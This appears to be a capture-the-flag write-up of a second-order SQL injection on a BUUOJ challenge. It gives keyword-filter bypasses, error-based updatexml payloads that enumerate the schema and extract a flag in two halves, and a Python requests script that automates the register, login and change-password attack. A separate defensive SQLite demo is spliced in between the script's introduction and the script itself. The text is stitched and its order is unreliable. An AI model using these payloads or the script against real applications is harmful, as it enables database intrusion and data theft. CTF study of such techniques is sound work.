Register an account and log in.
Fuzzing shows that these keywords are filtered: @, or, and, space, substr, mid, left, right, handle.
After logging in, you can change your own account's password.
After changing it, a second-order injection turns up: a payload injected into the username field at registration is echoed back on the change-password page.
Injection payloads
List the tables
username=xx"||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#
List the columns
The output length turns out to be limited, so regexp is used to narrow the result.
username=xxx"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&(column_name)regexp('^r'))),1))#
Query the column contents
xxxx"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#
Only half of the flag is output:
~flag{9489c8dc-433e-4b90-b391-55~
So next, output it in reverse to get the other half:
xxxxx"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#
~}c68a97998e55-193b-09b4-e334-cd~
Joining the two halves gives the full flag.
Let's also take a look at peri0d's script:
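To show, from the defender's side, why the keyword filter at registration did not help, here is an added example (not from the writeup or the challenge) of the same second-order flow against an in-memory SQLite table. It assumes a constructed users table with a placeholder flag, and hypothetical register/change_password functions; SQLite has no updatexml(), so the point shown is the stored name being pasted into a later query, not the error-based extraction.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge's users table (column name taken from
# the writeup; the flag value is a placeholder).
SCHEMA = """
CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, real_flag_1s_here TEXT);
INSERT INTO users VALUES ('admin', 'admin-pass', 'flag{placeholder}');
"""

def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def register(conn, username, password):
    # Registration binds its parameters, so any name is stored verbatim. A keyword filter
    # at this step does not help: the value only becomes dangerous when a later query trusts it.
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))

def change_password_vulnerable(conn, session_user, new_password):
    # The username read back for the logged-in session is concatenated into a new statement.
    # This is the shape the writeup exploits via changepwd.php.
    sql = "UPDATE users SET password = '%s' WHERE username = '%s'" % (new_password, session_user)
    conn.execute(sql)

def change_password_fixed(conn, session_user, new_password):
    # Bound parameters: the stored name can only ever compare equal to itself.
    conn.execute("UPDATE users SET password = ? WHERE username = ?", (new_password, session_user))

def password_of(conn, username):
    return conn.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()[0]

def demo(change_password):
    # Register a name whose quote closes the literal in the *second* query, then change the
    # password as that user and see whose rows were touched. Returns (admin pw, registered pw).
    conn = new_db()
    stored_name = "mallory' OR username = 'admin' --"   # constructed sample name
    register(conn, stored_name, "123")
    change_password(conn, stored_name, "new-pass")
    return password_of(conn, "admin"), password_of(conn, stored_name)

if __name__ == "__main__":
    print("vulnerable:", demo(change_password_vulnerable))  # admin row overwritten
    print("fixed:     ", demo(change_password_fixed))       # only the registered row changes
```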
import requests

url_reg = 'http://ec5befee-3784-4aaa-b457-255e4b859a1f.node3.buuoj.cn/register.php'
url_log = 'http://ec5befee-3784-4aaa-b457-255e4b859a1f.node3.buuoj.cn/login.php'
url_change = 'http://ec5befee-3784-4aaa-b457-255e4b859a1f.node3.buuoj.cn/changepwd.php'

# Prefix closes the username string; suffix closes the regexp/select/updatexml and comments out the rest.
pre = 'peri0d"'
suf = "'))),1))#"
s = 'abcdefghijklmnopqrstuvwxyz1234567890'
s = list(s)
r = requests.session()


def register(name):
    data = {
        'username': name,
        'password': '123',
        'email': '123',
    }
    r.post(url=url_reg, data=data)


def login(name):
    data = {
        'username': name,
        'password': '123',
    }
    r.post(url=url_log, data=data)


def changepwd():
    data = {
        'oldpass': '',
        'newpass': '',
    }
    kk = r.post(url=url_change, data=data)
    # A normal response contains 'target'; anything else is the XPath error carrying the result.
    if 'target' not in kk.text:
        print(kk.text)


# Try each candidate character as the regexp pattern: register with the payload as username,
# log in as it, then trigger the second-order injection on the change-password page.
for i in s:
    payload = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
    register(payload)
    login(payload)
    changepwd()
